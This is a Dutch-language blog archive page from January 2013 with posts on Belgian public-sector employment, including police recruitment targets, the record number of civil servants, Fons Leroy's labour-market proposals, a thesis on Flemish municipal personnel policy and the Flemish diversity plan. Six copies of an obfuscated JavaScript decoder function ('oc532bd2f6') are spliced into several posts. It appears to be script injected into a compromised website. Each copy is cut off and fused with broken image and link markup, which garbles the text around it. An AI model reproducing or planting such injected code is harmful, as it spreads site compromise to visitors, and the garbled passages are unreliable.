Archief januari, 2013

Reacties uitgeschakeld voor Politie heeft 1400 aspirant-inspecteurs gerekruteerd in 2012

Politie heeft 1400 aspirant-inspecteurs gerekruteerd in 2012

Door | 18 januari 2013 | Nieuws

Veiligheid verhogen voor de burgers

 

BRUSSEL, 18/01/2012.– Eind december 2012 behaalde de Directie van de rekrutering en van de selectie van de federale politie de doelstelling om 1400 apsirant-inspecteurs aan te werven. Dat is een stijging van 40% ten opzichte van 2011. De politie is nog altijd een aantrekkelijke werkgever want ongeveer 14.000 personen hebben zich kandidaat gesteld om inspecteur te worden.

 

 

 

Om de veiligheid van de burgers te verhogen en naar aanleiding van de geweldplegingen op het Brusselse openbaar vervoer, nam de Minister van Binnenlandse Zaken, Joëlle Milquet, in april 2012 de beslissing om het gemiddelde jaarlijkse quotum van 1000 aanwervingen van inspecteurs binnen de geïntegreerde politie, te verhogen met 400 aanwervingen.

 

 

 

1400 inspecteurs om de gelederen te versterken

 

In 2012 behaalde de Directie van de rekrutering en van de selectie van de federale politie de doelstelling om 1400 aspirant-inspecteurs aan te werven. Dat zijn 400 inspecteurs meer dan in 2011.

 

250 van deze 400 aspirant-inspecteurs zijn voorzien voor de politiezones in de regio Brussel-Hoofdstad. De andere 150 inspecteurs worden aangeworven in de federale reserve van de Spoorwegpolitie.

 

De eerste kandidaten ronden in juni hun opleiding af en kunnen in 2013 beantwoorden aan de noden van de zones en de federale politie.

 

De laatste kandidaten tekenden eind december 2012 om in maart en april 2013 de politiescholen van Brussel, Gent, Asse, Jurbise, Luik en Namen te vervoegen.

 

 

 

De 1000 andere kandidaten zullen de openstaande vacatures invullen bij zowel de federale als de lokale politie.

 

 

 

De aanwerving van 1400 bijkomende politieambtenaren in slechts enkele maanden was mogelijk dankzij efficiënte en moderne aanwervingscampagnes en dankzij het engagement van de partners. In totaal stelden bijna 14 000 mensen zich kandidaat voor deze functie.

 

 

 

Doelstelling 2013: 1500 inspecteurs

 

Vanaf vandaag richt de Directie van de rekrutering en van de selectie zich op de aanwerving van 1400 'klassieke' kandidaten voor de geïntegreerde politie (waarbij het jaarlijks quotum, net zoals in 2012, stijgt met 400 aanwervingen) en 100 'prioritaire' kandidaten voor de federale politie. De Directie van de rekrutering en van de selectie verwacht dat deze doelstelling binnen de komende 6 maanden behaald wordt.

 

 

 

Agnès Reis

 

Woordvoerster

Reacties uitgeschakeld voor Recordaantal ambtenaren in België

Recordaantal ambtenaren in België

Door | 15 januari 2013 | Nieuws

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandscape670/105226488.jpg” width=”670″ height=”376″ />

VRT

di 15/01/2013 – 08:18België heeft een recordaantal ambtenaren. Tussen 2000 en 2010 zijn er in heel het land 10.000 ambtenaren bijgekomen. Dat blijkt uit een studie van de Nationale Bank die De Morgen kon inkijken. Volgens gouverneur Luc Coene kan de overheid op die manier onmogelijk haar uitgaven onder controle houden.

"The return of the Deficit. Public Finance in Belgium over 2000-2010" heet de nieuwe studie van de Nationale Bank. Daaruit blijkt dat de overheidsdiensten in ons land tussen 2000 en 2010 10.000 extra ambtenaren hebben aangenomen.

België heeft daardoor een recordaantal ambtenaren in dienst. Ons land staat daarmee op de tweede plaats in Europa, na Cyprus. Het zijn vooral de gewesten, gemeenschappen en gemeenten die meer ambtenaren hebben aangenomen.

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandscape190/876242229.jpg" width="190" height="107" />

Belga

Luc Coene (foto in tekst), gouverneur van de Nationale Bank, vindt de evolutie onrustwekkend. "Met elke nieuwe regelgeving van de gewesten en gemeenschappen kwamen er nieuwe ambtenaren. Voor cultuur, voor milieu, voor sport, voor vergrijzing, terwijl er vaak onvoldoende activiteiten voorhanden waren", zei Coene maandag op een forum over de openbare financiën. "Op dat gebied hebben we veel laten ontsporen."

Volgens Coene legt de ambtenarij een te groot beslag op de uitgaven van de overheid, waardoor ze het moeilijk heeft om haar uitgaven onder controle te krijgen.

Omdat de toename van de ambtenarij het grootst is bij de gemeenschappen en gewesten kijkt Coene in hun richting om iets aan het probleem te doen. Door te besparen op de ambtenarij kunnen ze een grotere bijdrage leveren aan de verdere sanering van de Belgische begroting, vindt hij.

Reacties uitgeschakeld voor Fons Leroy lanceert discussie

Fons Leroy lanceert discussie

Door | 11 januari 2013 | Nieuws

“Productiviteit belangrijker voor loon dan anciënniteit?”

wo 09/01/2013 – 08:11 Fons Leroy, de topman van de arbeidsbemiddelaar VDAB, stelt het principe in vraag dat wie langer werkt ook een hoger loon krijgt. Ook de ontslagvergoedingen en loopbaanbegeleiding moeten volgens Leroy worden hertekend. “De arbeidsmarkt heeft een nieuwe partituur nodig”, zegt hij in De Morgen.

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandscape110/1515109580.jpg” width=”110″ height=”62″ />Belga

“2012 was een verloren jaar”: Fons Leroy spaart zijn kritiek op de regering én de sociale partners niet. “De crisis maakt duidelijk dat er doortastende maatregelen nodig zijn, maar wat er nu gebeurt, is gerommel in de marge.”

Leroy pleit ervoor om het arbeidsmarktbeleid van nul te hertekenen en alles opnieuw te ontwerpen. Het beleid is totaal niet meer aangepast aan de noden van vandaag en de uitdagingen van de toekomst, vindt Leroy.

Concreet zijn er drie domeinen waar Leroy voor verandering pleit.

 • Loonvorming en anciënniteit: Hoe ouder, hoe hoger het loon, zo is het principe vandaag, maar dat stelt Leroy in vraag: "We moeten afstappen van lineaire anciënniteitsverhogingen bij bedienden -bij arbeiders speelt dat minder- en de loonevoluties moeten dus meer rekening houden met productiviteit en competenties. Het moet economisch haalbaar blijven voor de werkgever én de werknemer om mensen met veel goesting langer aan het werk te houden."
 • Ontslagbeleid en -vergoedingen: "Het beleid moet erop gericht zijn om mensen zo snel mogelijk van job naar job te helpen." Daarom plaatst Leroy vraagtekens bij hoge ontslagvergoedingen. Hij vreest dat veel mensen door de hoge ontslagpremie zich lange tijd terugtrekken uit de arbeidsmarkt, "al is de ontslagvergoeding maar één facet".
 • Vorming: Ook op het vlak van loopbaanbegeleiding heeft Leroy voorstellen. "Waarom kunnen bedrijven geen vorming organiseren in periode van economische werkloosheid?" De topman van de VDAB pleit er ook voor om werknemers regelmatig te vragen hoe ze zelf hun toekomst zien, iets dat in veel sectoren niet gebeurt.
Reacties uitgeschakeld voor Personeelsbeleid bij Vlaamse gemeenten

Personeelsbeleid bij Vlaamse gemeenten

Door | 8 januari 2013 | Lectuur

Doctoraat: Beleidsruimte in personeelsaangelegenheden bij Vlaamse gemeenten. Hoe vullen de gemeenten hun lokale beleidsruimte in? Maatwerk versus uniformiteit (2012)

Doctorandus: Peeters Nele
Promotoren: Janvier Ria & Van Dooren Wouter.
280 p + bijlagen.
verdedigd op 17 januari 2012

Samenvatting

In dit proefschrift, resulterend uit het SBOV-project ‘Centrale aansturing versus decentrale autonomie in personeelsmateries bij de Vlaamse lokale overheden (2007-2011)’, staat de spanning tussen Vlaamse sturing en lokale autonomie in personeelsaangelegenheden bij Vlaamse gemeenten centraal. De algemene onderzoeksvraag die we wensen te beantwoorden, luidt als volgt: ‘In welke mate zorgt het nieuwe rechtspositiebesluit ervoor dat gemeenten een personeelsbeleid kunnen voeren op maat van de gemeente? Kunnen gemeenten werkelijk eigen keuzes maken binnen het vastgelegde kader, en welke factoren verhinderen of stimuleren het maken van die eigen keuzes?’

Vooreerst kunnen we op basis van documentanalyses van de vroegere en huidige regelgevende kaders stellen dat er ondanks de grote hoeveelheid Vlaamse regels toch ook beleidsvrijheid aan de lokale besturen wordt gegeven in personeelsaangelegenheden. Echter, wanneer we vervolgens bekijken hoe Vlaamse gemeenten omgaan met die beleidsvrijheid, valt op dat de overgrote meerderheid voor de invulling van haar personeelsbeleid een beroep doet op het voorbeeldstatuut dat het Agentschap voor Binnenlands Bestuur (ABB; de toezichthoudende overheid) ontwikkelde. Uit het verklarende onderzoek blijkt dat de gemeentegrootte (+), de anciënniteit van de personeelsverantwoordelijke (+), de toezichthoudende overheid (+ en -), de politiek-ambtelijke verhoudingen op gemeentelijk niveau (+), de Vereniging van Vlaamse Steden en Gemeenten (+) en een externe consultant (-) een belangrijke invloed uitoefenen op de keuze voor maatwerk in de lokale rechtspositie. De twee opvallendste bevindingen zijn: de toezichthoudende overheid oefent zowel een positieve als negatieve invloed uit op maatwerk, terwijl de invloed van de consultant tegengesteld is aan de verwachtingen.

De toezichthouders dienen enerzijds advies te verlenen aan de lokale besturen (coach) maar oefenen anderzijds toezicht uit op de lokale regelgeving (scheidsrechter). Deze dubbele rol brengt zowel voor de toezichthouders zelf als voor de lokale besturen onzekerheid met zich mee. Gemeenten roemen de toezichthoudende overheid voor haar begeleiding en adviezen, maar hekelen anderzijds de gedetailleerde toezichtuitoefening. Een belangrijke beleidsaanbeveling is dan ook om beide rollen meer uit elkaar te halen.

Consultants die worden ingeschakeld om gemeenten te begeleiden bij het opstellen van een rechtspositie, worden verondersteld samen met de gemeente te komen tot beleid op maat. Echter, we merken op dat gemeenten zich veelvuldig conformeren aan het model dat door de consultant zelf werd ontwikkeld. Gezien sommige consultants voor hun model vertrekken van het model van ABB, zien we dat de rechtspositie van veel van de gemeenten die een beroep deden op een externe consultant sterke gelijkenissen vertoont met het voorbeeldstatuut van ABB.

Een belangrijke kanttekening bij dit onderzoek, is dat het tijdsperspectief in rekening moet worden gebracht. De onderzochte regelgevende kaders, zowel Vlaams als lokaal, zijn zeer recent van aard. Vele gemeenten gaven in het onderzoek aan reeds diverse wijzigingen te hebben gepland. Bovendien stelden gemeenten in het kwalitatieve onderzoeksluik letterlijk nog onvoldoende te bevatten welke mogelijkheden en beperkingen de regelgeving biedt. De kans is met andere woorden reëel dat het regelgevend kader aangaande het lokale personeelsbeleid er binnen vijf jaar anders uitziet.

Algemeen kunnen we besluiten dat gemeenten in Vlaanderen aanzienlijke mogelijkheden hebben om hun personeelsbeleid af te stemmen op lokale noden en behoeften. Echter, de analyses in dit proefschrift toonden aan dat gemeenten deze vrijheid nog niet aanwenden om maatwerk af te leveren. Gezien gemeenten tevreden blijken over hun rechtspositieregeling, lijkt anno 2011 de algemene vraag naar meer lokale autonomie minder prangend.

Reacties uitgeschakeld voor Personeelsstatuut lokale besturen

Personeelsstatuut lokale besturen

Door | 8 januari 2013 | Nieuws

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndands” href=”http://app.readspeaker.com/cgi-bin/rsent?customerid=4612&lang=nl_be&url=http%3A%2F%2Fwww.vlaanderen.be%2Fnl%2Foverheid%2Fwerking-vlaamse-overheid%2Flokale-en-provinciale-werking%2Fhet-statuut-van-het-personeel-van-lokale-besturen" target="_blank"> 

De Vlaamse lokale besturen zoals provincies, gemeenten en OCMW's, bepalen zelf het statuut van hun personeel, maar dan wel binnen het kader van het 'besluit Rechtspositieregeling' van de Vlaamse Regering van 7 december 2007.

In het besluit zijn een aantal minimum- en maximumgrenzen vastgesteld waarbinnen de gemeenten en provincies ruimte krijgen om een eigen invulling te geven aan het personeelsbeleid binnen hun bestuur.

In de rechtspositieregelingen voor het personeel van de diverse lokale overheden moeten minstens de volgende elementen aan bod komen:

 • de rechten en plichten
 • de aanwervingsprocedures en de aanwervingsvoorwaarden
 • de functionele loopbaan, evaluatie en de bevordering
 • vorming en opleiding van het personeel
 • de bezoldigingsregeling - salarisschalen - regeling van vergoedingen en toelagen
 • de regels over ontslag en ambtsneerlegging van statutaire personeelsleden
 • de administratieve toestand van het statutaire personeel
 • de regels over verloven en afwezigheden

Meer info kunt u vinden op de website van het Agentschap voor Binnenlands Bestuur.

Reacties uitgeschakeld voor Diversiteitsplan 2013 voor Vlaamse overheid

Diversiteitsplan 2013 voor Vlaamse overheid

Door | 7 januari 2013 | Nieuws

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/files/styles/medium/public/Afbeelding_Hughes_1.png” width=”220″ height=”164″ />

De Vlaamse Regering keurde op vrijdag 21 december het Diversiteitsplan 2013 voor de Vlaamse overheid goed. Daarin staat dat er dringend een andere aanpak nodig is om de streefcijfers voor kansengroepen in 2015 te halen.

Het aantal medewerkers met een handicap of chronische ziekte blijft steken op een ondermaatse 1,2 %. Terwijl de groep van vrouwelijke topambtenaren met 24 % ongewijzigd blijft, valt het aantal vrouwelijke afdelingshoofden terug van 29 % naar 28 %. Het aantal collega’s met een migratieachtergrond stijgt wel licht, maar 2,8 % is nog altijd te laag.

Het nieuwe actieplan 2013 omvat heel wat acties. Zo start er een mentoringproject dat vijftien talentvolle medewerkers koppelt met evenveel afdelingshoofden, en zo meer vrouwen naar het middenmanagement wil gidsen. Een project van socio-economische telling tracht door een koppeling met federale gegevensbanken tot een betere telling te komen van medewerkers met een migratieachtergrond. De Vlaamse Emancipatieambtenaar zet haar bezoek aan de directiecomités verder. Haar dienst breidt het re-integratiebeleid uit, een beleid dat medewerkers die langdurig afwezig zijn ondersteunt in hun terugkeer naar de werkvloer.

De Vlaamse overheid streeft ernaar om van haar werkvloer een afspiegeling te maken van de diverse samenleving. Met reden. Dankzij onze medewerkers uit de kansengroepen krijgen we een juister zicht op wat er echt leeft in Vlaanderen en kunnen we onze dienstverlening daarop beter afstemmen. Sterke organisaties zijn altijd ook diverse organisaties.

Lees meer over emancipatiezaken

Contactpersoon

Ingrid Pelssers
Vlaams Emancipatieambtenaar
Departement Bestuurszaken
function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be">ingrid.pelssers@bz.vlaanderen.be

Publicatiedatum:
vrijdag, 21 december 2012